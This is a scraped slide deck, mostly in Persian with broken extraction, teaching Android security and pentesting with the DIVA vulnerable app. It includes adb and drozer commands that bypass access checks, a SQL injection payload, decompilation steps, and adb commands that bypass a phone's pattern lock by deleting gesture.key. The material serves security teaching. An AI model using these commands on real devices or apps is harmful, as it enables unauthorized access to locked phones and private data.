SlideShare a Scribd company logo
ANDROID SECURITY
SAEID GHASEM SHIRAZI
ANDROID ARCHITECTURE
●
‫امنیتی‬ ‫ردیف‬ ‫دو‬
:
Linux based - Android based
●
‫شوند‬‫می‬ ‫اجرا‬ ‫همزمان‬ ‫طور‬ ‫به‬
●
‫اپ‬ ‫هر‬
UID
‫و‬
GID
‫دارد‬ ‫را‬ ‫خودش‬ ‫به‬ ‫مخصوص‬
●
Permission
‫دهند‬‫می‬ ‫اندروید‬ ‫های‬ ‫فایل‬ ‫و‬ ‫منابع‬ ‫به‬ ‫امن‬ ‫دسترسی‬ ‫لینوکس‬ ‫های‬
●
Permission Model
‫اندروید‬
SECURITY ARCHITECTURE
●
‫در‬
AndroidManifest.xml
‫میشوند‬ ‫تعریف‬
●
‫میشوند‬ ‫مشخص‬ ‫نویس‬‫برنامه‬ ‫توسط‬
●
‫نیستند‬ ‫شدن‬ ‫اضافه‬ ‫قابل‬ ‫بعدا‬
●
All or None Flaws
○
‫از‬ ‫کوچکتر‬ ‫اندروید‬ ‫در‬
۴
‫درخواست‬ ‫به‬ ‫نیازی‬
READ_EXTERNAL_STORAGE
‫از‬ ‫خواندن‬ ‫برای‬
sdcard
‫نیست‬
ANDROID PERMISSIONS
●
‫میکند‬ ‫مشخص‬ ‫را‬ ‫اپلیکیشن‬ ‫خصوصیات‬
●
Package Name
●
Activities, Services, Broadcast Receivers etc.
●
‫ها‬‫دسترسی‬ ‫تعریف‬
●
‫خارجی‬ ‫های‬‫کتابخانه‬ ‫اطالعات‬
●
SharedUID
ANDROIDMANIFEST.XML
●
‫به‬ ‫اپ‬ ‫هر‬
UID
‫دارد‬ ‫فرد‬ ‫به‬ ‫منحصر‬
●
‫موارد‬ ‫بعضی‬ ‫در‬
۲
‫یک‬ ‫دارای‬ ‫اپ‬
UID
‫هستند‬
●
‫به‬ ‫متعلق‬ ‫است‬ ‫ممکن‬ ‫ها‬ ‫اپ‬
GID
‫دارند‬ ‫که‬ ‫هایی‬ ‫دسترسی‬ ‫اساس‬ ‫بر‬ ‫باشند‬ ‫مختلف‬ ‫های‬
●
‫در‬
/
data/system/packages.xml
‫میشود‬ ‫ذخیره‬
‫اطالعات‬
‫تر‬‫عمیق‬
• File format APK
• Archive file contains the java codes, raw files and the other resources
• Runs within a virtual machine
• Dalvik Virtual Machine executes the dex file
ANDROID SECURITY & EXPLOITATION
ANDROID APPLICATIONS
●
‫دهنده‬ ‫توسعه‬
Certificate
‫میکند‬ ‫تولید‬ ‫را‬ ‫خودش‬
●
‫توسط‬ ‫اپ‬
public key
‫و‬ ‫میشود‬ ‫امضا‬
private key
‫میماند‬ ‫باقی‬ ‫دهنده‬‫توسعه‬ ‫نزد‬ ‫در‬
SIGNING IN ANDROID
●
MANIFEST.MF
‫منابع‬
‫میکند‬ ‫اعالم‬ ‫را‬
●
CERT.RSA
‫گواهی‬
‫عمومی‬ ‫کلید‬
●
CERT.SF
‫تمامی‬
‫اپ‬ ‫امضای‬ ‫برای‬ ‫شده‬ ‫ثبت‬ ‫منابعی‬
‫اپ‬ ‫امضای‬ ‫نمایش‬
keytool -printcert -file META-INF/CERT.RSA
VERIFYING APPS SIGNATURE
• Activities
• Services
• Broadcast Receivers
• Shared Preferences
• Intents
• Content Providers
ANDROID APP COMPONENTS
●
‫برنامه‬
‫های‬
‫اندرویدی‬
‫در‬
‫فایلهایی‬
‫با‬
‫پسوند‬
apk
‫برگرفته‬
‫از‬
Android Package
‫توزیع‬
‫می‬
‫شوند‬
●
‫این‬
‫فایلها‬
‫چیزی‬
‫نیستند‬
‫جز‬
‫فایل‬
‫های‬
‫فشرده‬
‫شده‬
zip
‫از‬
‫یک‬
‫سری‬
‫فایلهای‬
‫بایت‬
‫کد‬
‫کامپایل‬
،‫شده‬
‫فایلها‬
XML
‫کامپایل‬
‫شده‬
‫و‬
‫سایر‬
‫ریسورس‬
‫های‬
‫برنامه‬
.
● /assets
● /res
● /lib
● /META-INF
● AndroidManifest.xml
● classes.dex
● resources.asrc
‫فایل‬ ‫ساختار‬
APK
●
‫پوشه‬ ‫در‬
assets
‫دهند‬ ‫می‬ ‫قرار‬ ‫را‬ ‫شوند‬ ‫استفاده‬ ‫برنامه‬ ‫در‬ ‫خواهند‬ ‫می‬ ‫که‬ ‫فایلهایی‬ ‫ها‬ ‫نویس‬ ‫برنامه‬
.
●
‫پوشه‬
res
‫های‬ ‫فایل‬ ‫حاوی‬
layout
،
‫خواه‬ ‫می‬ ‫نویس‬ ‫برنامه‬ ‫که‬ ‫منابع‬ ‫سایر‬ ‫و‬ ،‫کاربری‬ ‫رابط‬ ‫در‬ ‫شده‬ ‫استفاده‬ ‫تصاویر‬
‫د‬
●
‫پوشه‬
lib
‫های‬ ‫کتابخانه‬ ‫حاوی‬
Native
‫است‬ ‫شده‬ ‫منتشر‬ ‫برنامه‬ ‫همراه‬ ‫که‬ ‫است‬
.
●
‫پوشه‬
META-INF
‫فایل‬ ‫کل‬ ‫برای‬ ‫متادیتایی‬
apk
‫دارد‬ ‫می‬ ‫نگه‬ ‫را‬
.
‫فایل‬ ‫این‬ ‫در‬ ‫موجود‬ ‫فایلهای‬ ‫همه‬ ‫لیست‬ ‫یعنی‬
apk
‫و‬
‫و‬ ،‫آنها‬ ‫چکسام‬
certificate
‫غیره‬ ‫و‬
●
‫فایل‬
classes.dex
‫برنامه‬ ‫شده‬ ‫کامپایل‬ ‫کد‬
.
‫کامپ‬ ‫وقتی‬ ‫ولی‬ ‫شوند‬ ‫می‬ ‫نوشته‬ ‫جاوا‬ ‫زبان‬ ‫با‬ ‫اندرویدی‬ ‫های‬ ‫برنامه‬
‫می‬ ‫ایل‬
‫ماشین‬ ‫دالویک‬ ‫باینری‬ ‫به‬ ،‫شوند‬
Delvik
‫کامپایل‬
‫می‬
‫شوند‬
.
‫فایل‬ ‫ساختار‬
APK
‫شده‬ ‫خارج‬ ‫فشرده‬ ‫حالت‬ ‫از‬
‫فایل‬ ‫ساختار‬
APK
‫شده‬ ‫خارج‬ ‫فشرده‬ ‫حالت‬ ‫از‬
1. Insecure Logging
2. Hardcoding Issues
3. Insecure Data Storage
4. Input Validation vulnerabilities
5. Access Control Issues
DIVA APP
●
‫یک‬ ‫دارای‬ ‫اندروید‬
logcat
‫است‬ ‫مرکزی‬
●
‫میشود‬ ‫استفاده‬ ‫یابی‬‫عیب‬ ‫برای‬ ‫نویسان‬‫برنامه‬ ‫توسط‬ ‫معموال‬
●
‫توسط‬
ADB
‫است‬ ‫دسترسی‬ ‫قابل‬
○
Adb shell ps | grep -i ''appname
○
Adb shell logcat | grep [pid]
INSECURE LOGGING
●
‫را‬ ‫اندروید‬ ‫اپ‬
Reverse
‫از‬ ‫استفاده‬ ‫با‬ ‫کنید‬
jadx
‫یا‬
dex2jar
●
‫کنید‬ ‫آنالیز‬ ‫را‬ ‫اپ‬ ‫منبع‬ ‫کد‬
●
‫بیابید‬ ‫را‬ ‫مخفی‬ ‫های‬ ‫کلید‬
HARDCODING ISSUES
●
‫کن‬ ‫چک‬ ‫را‬ ‫اپ‬ ‫محلی‬ ‫حافظه‬
●
‫از‬
Shared Preferences
‫میکند‬ ‫اسستفاده‬ ‫شازی‬ ‫ذخیره‬ ‫بزای‬
●
‫حساس‬ ‫اطالعات‬ ‫از‬ ‫زیادی‬ ‫دهندگان‬‫توسعه‬
INSECURE DATA STORAGE (PART 1)
●
‫کن‬ ‫چک‬ ‫را‬ ‫اپ‬ ‫محلی‬ ‫حافظه‬
●
‫است‬ ‫شده‬ ‫استفاده‬ ‫اطالعات‬ ‫ذخیره‬ ‫برای‬ ‫داده‬ ‫پایگاه‬ ‫از‬
●
/
data/data/packagename/ databases]
INSECURE DATA STORAGE (PART 2)
●
‫کن‬ ‫چک‬ ‫را‬ ‫اپ‬ ‫محلی‬ ‫حافظه‬
●
‫میشود‬ ‫استفاده‬ ‫ها‬ ‫فایل‬ ‫ذخیره‬ ‫برای‬ ‫موقت‬ ‫های‬ ‫فایل‬ ‫از‬
●
/
data/data/packagename
●
‫نام‬ ‫با‬ ‫جدید‬ ‫فایل‬
uinfo-*tmp
‫است‬ ‫شده‬ ‫ساخته‬
INSECURE DATA STORAGE (PART 3)
●
‫میشود‬ ‫استفاده‬ ‫خارجی‬ ‫حافظه‬ ‫از‬
●
/
mnt/sdcard
●
‫نام‬ ‫با‬ ‫جدید‬ ‫فایل‬
.
uinfo.txt
‫است‬ ‫شده‬ ‫ساخته‬
INSECURE DATA STORAGE (PART 4)
●
‫پذیری‬ ‫آسیب‬ ‫قدیمی‬ ‫نمونه‬
SQL Injection
●
‫ورودی‬ ‫داده‬ ‫اعتبار‬ ‫عدم‬
●
‫درخواست‬ ‫اجرای‬ ‫و‬ ‫کاربر‬ ‫ورودی‬ ‫دریافت‬
SQL
●
‫همیشه‬ ‫روبرو‬ ‫عبارت‬
true
‫است‬
1
’ or ‘1’ =‘1’--
INPUT VALIDATION ISSUE
●
‫محتوای‬ ‫تا‬ ‫کرده‬ ‫استفاده‬ ‫کاربر‬ ‫ورودی‬ ‫اطالعات‬
browser
‫دهد‬ ‫نمایش‬ ‫را‬
●
‫دهد؟‬ ‫می‬ ‫اجازه‬ ‫هم‬ ‫فایل‬ ‫به‬ ‫آیا‬
://
file
●
‫خواند؟‬ ‫روش‬ ‫این‬ ‫با‬ ‫را‬ ‫داخلی‬ ‫حافظه‬ ‫های‬ ‫فایل‬ ‫میتوان‬ ‫آیا‬ ‫اره‬ ‫اگر‬
●
‫چطور؟‬ ‫خارجی‬ ‫حافظه‬
INPUT VALIDATION ISSUE(PART 2)
●
API Credential
‫هستند‬ ‫کاربر‬ ‫دسترس‬ ‫در‬ ‫ها‬
●
‫باشیم‬ ‫داشته‬ ‫دسترسی‬ ‫اپ‬ ‫خارج‬ ‫از‬ ‫آن‬ ‫به‬ ‫میخواهیم‬ ‫ما‬
●
‫فایل‬
AndroidManifest
‫کنید‬ ‫چک‬ ‫را‬
●
‫نام‬ ‫با‬ ‫فیلتر‬ ‫اینتنت‬ ‫یک‬
packagename.action.VIEW_CREDS
‫میکند‬ ‫تعریف‬
●
Adb shell am start -a packagename.acction.VIEW_CREDS
ACCESS CONTROL ISSUES(PART 1)
●
‫دهد‬‫نمی‬ ‫جواب‬ ‫قبل‬ ‫روش‬
●
‫یک‬
argument
‫نام‬ ‫به‬ ‫دیگر‬
chk_pin
‫نوع‬ ‫از‬
boolean
‫میگیرد‬
ACCESS CONTROL ISSUES(PART 2)
●
‫از‬ ‫استفاده‬ ‫با‬
drozer :
○
run app.activity.info -a jakhar.aseem.diva
○
run app.activity.start --component jakhar.aseem.diva
jakhar.aseem.diva.APICreds2Activity --extra boolean chk_pin
false
ACCESS CONTROL ISSUES (PART 2)
●
‫دهیم‬ ‫قرار‬ ‫ها‬‫یادداشت‬ ‫برای‬ ‫رمز‬ ‫یک‬ ‫که‬ ‫میخواهد‬ ‫ما‬ ‫از‬
.
●
‫از‬
Content Provider
‫میکند‬ ‫استفاده‬
.
●
‫از‬
Drozer
‫برای‬
exploit
‫میکنیم‬ ‫استفاده‬ ‫کردن‬
ACCESS CONTROL (PART 3)
●
JNI
‫شده‬ ‫استفاده‬ ‫ارزیابی‬ ‫عنوان‬ ‫به‬
●
‫پوشه‬ ‫درون‬
lib
‫میشود‬ ‫بررسی‬
●
‫فایل‬
.
so
‫میکشیم‬ ‫بیرون‬ ‫زا‬
●
‫از‬ ‫آن‬ ‫بیشتر‬ ‫فهمیدن‬ ‫برای‬
objdump
‫و‬
readelf
‫میکنیم‬ ‫استفاده‬
●
‫بخش‬
.
rodata
‫کنید‬ ‫چک‬ ‫را‬
(
‫باینری‬ ‫صورت‬ ‫به‬ ‫ثابت‬ ‫داده‬ ‫داشتن‬ ‫نگه‬ ‫برای‬ ‫بخشی‬
)
HARDCODING ISSUES (PART 2)
•objdump -s -j .rodata *.so
• -s : show the full content
• -j : specifying the segment name
•readelf -x .rodata *.so
• -x : specifying the section name
HARDCODING ISSUES (PART 2)
‫چیست؟‬ ‫معکوس‬ ‫مهندسی‬ ‫از‬ ‫ما‬ ‫هدف‬
•
‫مهندسی‬
‫معکوس‬
‫یعنی‬
‫این‬
‫که‬
‫ما‬
‫فقط‬
‫از‬
‫یه‬
‫فایل‬
‫کامپایل‬
‫شده‬
‫و‬
،‫نهایی‬
‫که‬
‫ممکن‬
‫است‬
‫انو‬
‫اع‬
‫مبهم‬
‫سازی‬
‫ها‬
‫و‬
‫بهینه‬
‫سازی‬
‫ها‬
‫روی‬
‫آن‬
‫انجام‬
،‫شده‬
‫به‬
‫دانش‬
(
‫تا‬
‫جایی‬
‫که‬
‫ممکن‬
‫است‬
‫عمیق‬
)
‫درباره‬
‫آن‬
‫سیستم‬
‫برسیم‬
.
‫مثال‬
‫درباره‬
‫برنامه‬
‫های‬
،‫اندرویدی‬
‫ما‬
‫فقط‬
‫فایل‬
apk
‫برنامه‬
‫را‬
‫داریم‬
.
‫می‬
‫خواهیم‬
،‫ببینیم‬
‫این‬
‫برنامه‬
‫با‬
‫چه‬
‫وب‬
‫سرویس‬
‫هایی‬
‫سرو‬
‫کار‬
‫دارد‬
.
‫یا‬
‫فرایندهای‬
‫مختلف‬
‫را‬
‫چگونه‬
‫انج‬
‫ام‬
‫می‬
‫دهد‬
.
•
‫مثال‬
‫بعد‬
‫از‬
‫اولین‬
،‫الگین‬
‫چه‬
‫اطالعاتی‬
‫از‬
،‫من‬
‫در‬
‫کجا‬
‫و‬
‫به‬
‫چه‬
‫گونه‬
‫ذخیره‬
‫می‬
،‫کند‬
‫که‬
‫در‬
‫دفع‬
‫ات‬
‫بعدی‬
‫نیاز‬
‫به‬
‫الگین‬
‫مجدد‬
‫نیست‬
.
‫اینکه‬
‫بیاییم‬
‫از‬
‫این‬
‫اطالعات‬
‫سوءاستفاده‬
،‫کنیم‬
‫می‬
‫ش‬
‫ود‬
‫مرحله‬
،‫بعدی‬
‫که‬
‫با‬
‫اطالعات‬
‫و‬
‫دانشی‬
‫که‬
‫از‬
‫مهندسی‬
‫معکوس‬
‫کسب‬
‫کرده‬
،‫ایم‬
‫شروع‬
‫به‬
‫پن‬
‫تست‬
‫م‬
‫ی‬
‫کنیم‬
.
MAKING APK
REVERSING THE APK
‫فایل‬ ‫آوردن‬ ‫بدست‬
APK
•
‫سایت‬ ‫از‬ ‫برنامه‬ ‫دانلود‬ ‫اول‬ ‫روش‬
:
https://apps.evozi.com/apk-downloader/
•
‫دوم‬ ‫روش‬
:
•
‫روش‬
‫دیگر‬
‫این‬
‫است‬
‫که‬
‫آن‬
‫برنامه‬
‫را‬
‫روی‬
‫اموالتور‬
‫یا‬
‫گوشی‬
‫نصب‬
‫کنید‬
.
‫برای‬
‫مثال‬
‫بروید‬
‫به‬
‫گوگل‬
‫اپز‬
‫یا‬
‫بازار‬
،
‫برنامه‬
‫را‬
‫جستجو‬
‫کنید‬
‫و‬
‫نصب‬
‫کنید‬
.
‫و‬
‫بعد‬
‫با‬
adb
‫نسخه‬
apk
‫که‬
‫از‬
‫آن‬
‫برای‬
‫نصب‬
‫استفاده‬
‫شده‬
‫را‬
‫دریافت‬
‫کنید‬
.
‫برای‬
‫این‬
‫کار‬
‫نیاز‬
‫به‬
‫آدرس‬
‫فایل‬
‫دارید‬
.
‫برای‬
‫بدست‬
‫آوردن‬
‫آدرس‬
‫فایل‬
‫هم‬
‫نیاز‬
‫به‬
‫اسم‬
‫کامل‬
‫پکیج‬
‫برنامه‬
‫دارید‬
.
‫بنابرین‬
‫از‬
‫ای‬
‫نکه‬
‫چگونه‬
‫باید‬
‫اسم‬
‫پکیج‬
‫را‬
‫بدست‬
‫آورد‬
‫شروع‬
‫می‬
‫کنیم‬
:
•
‫روش‬
‫گوگل‬ ‫آسان‬
‫است‬
‫بازار‬ ‫یا‬ ‫اپز‬ ‫گوگل‬ ‫در‬ ‫را‬ ‫آن‬ ‫صفحه‬ ‫و‬ ‫کنید‬ ‫گوگل‬
‫در‬ ‫ببینید‬
URL
‫پکیج‬ ‫آدرس‬ ‫بتوانید‬ ‫باید‬ ‫شما‬ ‫صفحه‬
‫ببنید‬ ‫را‬
.
•
‫یا‬ ‫افزار‬ ‫نرم‬ ‫این‬
Script
‫محیط‬ ‫یک‬ ‫توسط‬ ‫شما‬ ‫به‬
‫ترمینال‬
‫چه‬
‫اجازه‬ ‫ویندوز‬ ‫در‬ ‫چه‬ ‫و‬ ‫لینوکس‬ ‫عامل‬ ‫سیستم‬ ‫در‬
‫ودسترسی‬
‫مدیریت‬
‫کامند‬ ‫اجرای‬ ‫و‬ ‫اضافه‬ ،‫حذف‬ ،‫فایلها‬
‫های‬
‫لینوکس‬
‫بروی‬
‫سیستم‬
‫می‬ ‫را‬ ‫آندروید‬ ‫عامل‬
‫دهد‬
.
• https://ibotpeaches.github.io/Apktool/
ANDROID DEBUG BRIDGE & APKTOOLS
‫فایل‬ ‫آوردن‬ ‫بدست‬
APK
•
‫است‬ ‫شده‬ ‫نصب‬ ‫های‬ ‫برنامه‬ ‫لیست‬ ‫در‬ ‫جستجو‬ ‫نیز‬ ‫دیگر‬ ‫روش‬
:
• $ adb shell pm list packages | grep twitter
• package:com.twitter.android
•
‫با‬
‫این‬
‫دستور‬
‫شما‬
‫لیست‬
‫کامل‬
‫پکیج‬
‫را‬
‫مشاهده‬
‫می‬
‫کنیدو‬
‫آنرا‬
‫با‬
‫اسم‬
‫برنامه‬
‫فیلتر‬
‫می‬
‫کنید‬
.
‫احتمال‬
‫اینکه‬
‫آدرس‬
‫پکیج‬
‫را‬
‫از‬
‫این‬
‫روش‬
‫بدست‬
‫بیاورید‬
‫باالست‬
.
‫ولی‬
‫اگر‬
‫حاصل‬
‫فیلتر‬
‫خالی‬
‫بود‬
‫یا‬
‫آدرس‬
‫بدست‬
‫آمده‬
‫بیش‬
‫از‬
1
‫آدرس‬
‫بود‬
‫و‬
‫شما‬
‫شک‬
‫داشتید‬
‫کدام‬
‫یک‬
‫درست‬
،‫است‬
‫از‬
Drozer
‫کمک‬
‫بگیرید‬
.
‫با‬
‫دستور‬
‫زیر‬
‫در‬
Drozer
‫می‬
‫توانید‬
‫اسم‬
‫پکیج‬
‫برنامه‬
‫ای‬
‫با‬
‫نام‬
“
Terminal Emulator”
‫را‬
‫پیدا‬
‫کنید‬
.
• dz> run app.package.list -f "Terminal Emulator"
• jackpal.androidterm (Terminal Emulator)
•
‫فایل‬ ‫آوردن‬ ‫بدست‬
APK
•
‫بعد‬
‫آدرس‬ ‫زیر‬ ‫دستور‬ ‫با‬
apk
‫کنید‬ ‫پیدا‬ ‫را‬
:
• $ adb shell pm path jackpal.androidterm(PACKAGE NAME)
• package:/data/app/jackpal.androidterm-2.apk
•
‫زیر‬ ‫دستور‬ ‫با‬ ‫و‬
apk
‫بیرون‬ ‫بکشید‬ ‫را‬
:
• adb pull /data/app/jackpal.androidterm-2.apk
•
‫فایل‬ ‫از‬ ‫جاوا‬ ‫سورس‬ ‫آوردن‬ ‫بدست‬
APK
‫با‬
JADX
JADX
•
Jadx
‫سورسی‬ ‫آوردن‬ ‫بدست‬ ‫و‬ ‫اندرویدی‬ ‫های‬ ‫فایل‬ ‫کردن‬ ‫دیکامپایل‬ ‫برای‬ ‫که‬ ‫است‬ ‫بازی‬ ‫متن‬ ‫ابزار‬
‫م‬
‫شابه‬
‫شود‬ ‫می‬ ‫استفاده‬ ‫برنامه‬ ‫اصلی‬ ‫سورس‬
.
‫توان‬ ‫می‬ ‫بعبارتی‬
Jadx
‫تبدیل‬ ‫ابزار‬ ‫را‬
dex
‫به‬
java
‫نامید‬
.
•
‫آدرس‬ ‫از‬ ‫برنامه‬ ‫این‬ ‫اجرایی‬ ‫فایل‬ ‫و‬ ‫کد‬ ‫سورس‬
https://github.com/skylot/jadx
‫قابل‬
‫است‬ ‫دسترسی‬
.
‫است‬ ‫قابل‬ ‫کاماندالینی‬ ‫بصورت‬ ‫هم‬ ‫و‬ ‫گرافیکی‬ ‫بصورت‬ ‫هم‬ ‫برنامه‬ ‫این‬
‫است‬ ‫فاده‬
.
•
TRAFFIC INTERCEPT
Active:Burp,mitmproxy,charles,...
Passive:tcpdump,wireshark,...
‫کد‬ ‫امضای‬
•
‫امضای‬
‫یک‬
‫پکیج‬
‫اندروید‬
‫فایل‬
apk
‫با‬
‫استفاده‬
‫از‬
‫گواهینامه‬
‫های‬
‫دیجیتالی‬
‫که‬
‫کلید‬
‫خصوص‬
‫ی‬
‫آن‬
‫در‬
‫نزد‬
‫توسعه‬
‫دهنده‬
‫بصورت‬
‫امن‬
‫نگهداری‬
‫می‬
،‫شود‬
‫انجام‬
‫می‬
‫شود‬
.
‫امضای‬
‫پکیج‬
‫ها‬
‫به‬
‫منظور‬
‫شناسایی‬
‫صاحب‬
‫آن‬
‫برنامه‬
‫است‬
.
•
‫امضای‬
‫بسته‬
‫ها‬
‫اجباری‬
‫است‬
.
‫حتی‬
‫برنامه‬
‫هایی‬
‫که‬
‫درحال‬
‫توسعه‬
‫هستند‬
‫و‬
‫به‬
‫منظور‬
‫دی‬
‫باگ‬
‫روی‬
‫اموالتور‬
‫نصب‬
‫می‬
‫شوند‬
‫نیز‬
‫باید‬
‫با‬
‫گواهینامه‬
‫امضا‬
‫شوند‬
.
‫برنامه‬
‫نویس‬
‫ها‬
‫معموال‬
‫درگیر‬
‫تولید‬
‫گواهینامه‬
‫ها‬
‫و‬
‫امضای‬
‫بسته‬
‫ها‬
‫نیستند‬
‫و‬
‫این‬
‫کار‬
‫توسط‬
IDE
‫ها‬
‫مانند‬
Android
Studio
‫یا‬
Eclipse
‫در‬
‫زمان‬
‫تولید‬
‫بسته‬
‫ها‬
‫انجام‬
‫می‬
‫شود‬
.
•
‫اطالعات‬
‫گواهینامه‬
‫در‬
‫فایل‬
‫به‬
‫اسم‬
CERT.RSA
‫درون‬
‫فایل‬
APK
‫تعبیه‬
‫می‬
‫شود‬
.
‫اگر‬
‫بخاطر‬
‫داشته‬
،‫باشید‬
‫هر‬
‫فایل‬
apk
‫یک‬
‫فایل‬
‫زیپ‬
‫است‬
‫و‬
‫می‬
‫توانید‬
‫با‬
‫ابزارهای‬
‫معمول‬
‫آن‬
‫را‬
‫باز‬
‫کرده‬
‫و‬
‫این‬
‫فایل‬
‫را‬
‫مشاهده‬
‫کنید‬
.
‫تشخیص‬
DEBUGGABLE
‫تایم‬ ‫ران‬ ‫در‬ ‫برنامه‬ ‫بودن‬
•
‫ممکن‬
‫است‬
‫این‬
‫سوال‬
‫برایتان‬
‫پیش‬
،‫بیاد‬
‫که‬
‫خوب‬
‫اگر‬
‫من‬
‫در‬
‫منیفست‬
‫برنامه‬
‫تنظیم‬
‫کرده‬
‫باش‬
‫م‬
:
•
‫پس‬
‫برنامه‬
‫من‬
‫دیباگیبل‬
‫نیست‬
‫و‬
‫باید‬
‫خیالم‬
‫راحت‬
‫باشد‬
.
‫پس‬
‫چرا‬
‫باید‬
‫در‬
‫ران‬
‫تایم‬
‫نگران‬
‫این‬
‫باشم‬
‫که‬
‫آیا‬
‫دارم‬
‫دیباگ‬
‫می‬
‫شوم‬
‫یا‬
‫نه‬
.
•
‫جواب‬
‫این‬
‫است‬
‫که‬
‫ممکن‬
‫است‬
‫مهاجم‬
‫برنامه‬
‫شما‬
‫را‬
‫دستکاری‬
‫کرده‬
‫و‬
‫دوباره‬
‫امضا‬
‫کرده‬
‫است‬
‫یا‬
‫ممک‬
‫ن‬
‫است‬
‫گوشی‬
‫کاربر‬
‫شما‬
‫روت‬
‫شده‬
‫باشد‬
.
‫وقتی‬
‫گوشی‬
‫روت‬
‫باشد‬
‫این‬
‫امکان‬
‫وجود‬
‫دارد‬
‫که‬
‫تنظیمات‬
‫برنامه‬
‫که‬
‫در‬
‫فایل‬
/
data/system/packages.xml
‫قرار‬
،‫دارد‬
‫تغییر‬
‫داده‬
‫شود‬
.
•
‫مقدار‬ ‫که‬ ‫است‬ ‫این‬ ،‫ما‬ ‫بررسی‬ ‫اولین‬
debuggable
‫کنیم‬ ‫بررسی‬ ‫منیفست‬ ‫در‬ ‫را‬
:
•
android:debuggable="false"
boolean debuggable = (getApplicationInfo().flags &
ApplicationInfo.FLAG_DEBUGGABLE) != 0;
PATH TRAVERSAL VULNERABILITY
•
‫این‬
‫نوع‬
‫از‬
‫آسیب‬
‫پذیری‬
‫با‬
‫نام‬
“
‫حمله‬
‫های‬
‫پیمایش‬
‫دایرکتوری‬
”
‫امکان‬
‫دسترسی‬
‫به‬
‫دای‬
‫رکتوری‬
‫های‬
‫محدود‬
‫شده‬
‫از‬
‫طرف‬
‫برنامه‬
‫نویس‬
‫و‬
‫همچنین‬
‫اجرای‬
‫دستور‬
‫هایی‬
‫خارج‬
‫از‬
‫دایرکتوری‬
‫ریش‬
‫ه‬
‫وب‬
‫سرور‬
‫را‬
‫برای‬
‫هکر‬
‫فراهم‬
‫می‬
‫سازد‬
.
‫حمله‬
TAPJACKING
•
‫حمله‬
Tapjacking
‫را‬
‫می‬
‫توان‬
clickjacking
‫دنیای‬
‫اندروید‬
‫نامید‬
.
‫در‬
‫این‬
‫حمله‬
‫برنامه‬
،‫بدخواه‬
‫سعی‬
‫دارد‬
‫با‬
‫نمایش‬
‫یک‬
‫رابط‬
‫کاربری‬
‫جعلی‬
fake user interface
‫کاربر‬
‫را‬
‫فریب‬
‫دهد‬
‫تا‬
‫روی‬
‫آن‬
‫صفحه‬
‫کلیک‬
‫کند‬
.
‫و‬
‫در‬
‫واقع‬
‫پشت‬
‫این‬
‫رابط‬
‫کاربری‬
‫جعلی‬
‫یک‬
‫اکتیویتی‬
‫از‬
‫برنامه‬
‫دیگر‬
‫باز‬
‫است‬
‫و‬
‫کلیک‬
‫ها‬
‫به‬
‫آن‬
‫برنامه‬
‫ارسال‬
‫می‬
‫شود‬
.
•
‫افزار‬ ‫بد‬ ‫تحلیل‬ ‫های‬ ‫روش‬ ‫انواع‬
•
‫تحلیل‬
‫پویا‬
:
‫استفاده‬
‫از‬
‫ابزار‬
‫های‬
‫مثل‬
wireshark
•
‫تحلیل‬
‫ایستا‬
:
•
‫استفاده‬
‫از‬
‫ابزار‬
‫هایی‬
‫مثل‬
:
•
Burpsuite
•
Hashcalc
•
Ida pro
•
‫بررسی‬
‫لیست‬
‫مجوز‬
‫های‬
‫دسترسی‬
•
‫تحلیل‬
‫سطح‬
‫باال‬
‫با‬
‫استفاده‬
‫از‬
‫کدهای‬
‫جاوا‬
•
‫تحلیل‬
‫سطح‬
‫پایین‬
‫با‬
‫استفاده‬
‫از‬
‫کد‬
‫های‬
smali
DANGER PERMISSIONS
DANGER API
APPLICATION SANDBOX
‫تضمین‬ ‫تا‬ ‫است‬ ‫گرفته‬ ‫نظر‬ ‫در‬ ‫اندروید‬ ‫که‬ ‫هایی‬ ‫مکانیزم‬ ‫یعنی‬
‫برسا‬ ‫آسیب‬ ‫دیگری‬ ‫برنامه‬ ‫اجرای‬ ‫به‬ ‫بود‬ ‫نخواهد‬ ‫قادر‬ ‫ای‬ ‫برنامه‬ ‫که‬ ‫دهد‬
‫مربوط‬ ‫اطالعات‬ ‫یا‬ ،‫ند‬
‫را‬ ‫دیگر‬ ‫برنامه‬
(
‫باشد‬ ‫شده‬ ‫داده‬ ‫اجازه‬ ‫صراحتا‬ ‫که‬ ‫حالتی‬ ‫در‬ ‫مگر‬
)
‫بخواند‬
.
TOP ANDROID SANDBOX
• https://sandbox.anlyz.io/#!/malware-dashboard
• https://app.any.run/
• https://valkyrie.comodo.com/
• https://www.hybrid-analysis.com/
• https://www.intezer.com/
• ....
BYPASS ANDROID PATTERN LOCK
• Adb shell connect
• Cd system
• adb shell rm /data/system/gesture.key
• Method2:
• adb shellcd /data/data/com.android.providers.settings/databasessqlite3
settings.dbupdate system set value=0 where
name='lock_pattern_autolock';update system set value=0 where
name='lockscreen.lockedoutpermanently';.quit
‫ابزار‬
QARK
•
‫ابزار‬
QARK
‫مخفف‬
QuickAndroid Review Kit
‫در‬
‫هت‬ ‫بلک‬
2015
‫شد‬ ‫معرفی‬
.
‫برای‬ ‫ابزار‬ ‫این‬
‫های‬ ‫بسته‬ ‫یا‬ ‫سورس‬ ‫در‬ ‫موجود‬ ‫های‬ ‫پذیری‬ ‫آسیب‬ ‫شناسایی‬
apk
‫است‬ ‫شده‬ ‫طراحی‬
.
‫روی‬ ‫تمرکزش‬
‫پذی‬ ‫آسیب‬ ‫بعضی‬ ‫کشف‬ ‫در‬ ،‫کد‬ ‫تحلیل‬ ‫و‬ ‫دیکامپایل‬ ‫با‬ ‫کرده‬ ‫سعی‬ ‫و‬ ‫است‬ ‫آنالیز‬ ‫استاتیک‬
‫کمک‬ ‫ها‬ ‫ری‬
‫کند‬
.
‫کار‬ ‫یک‬ ‫برای‬ ‫خود‬ ‫هسته‬ ‫در‬
(
‫دیکامپایل‬ ‫مثال‬
‫فایل‬ ‫یک‬ ‫کردن‬
)
‫استفاد‬ ‫ابزار‬ ‫یک‬ ‫از‬ ‫بیش‬ ‫از‬
‫کرده‬ ‫ه‬
‫ببرد‬ ‫باال‬ ‫را‬ ‫خود‬ ‫دقت‬ ‫تا‬ ‫باشد‬
.
‫ساختن‬ ‫با‬ ‫همچنین‬
Agent
‫بررسی‬ ‫در‬ ‫تواند‬ ‫می‬ ،‫برنامه‬ ‫هر‬ ‫مختص‬ ‫های‬
‫کند‬ ‫کمک‬ ‫آنها‬ ‫از‬ ‫سوءاستفاده‬ ‫یا‬ ‫شده‬ ‫کشف‬ ‫های‬ ‫پذیری‬ ‫آسیب‬ ‫اثبات‬
.
•
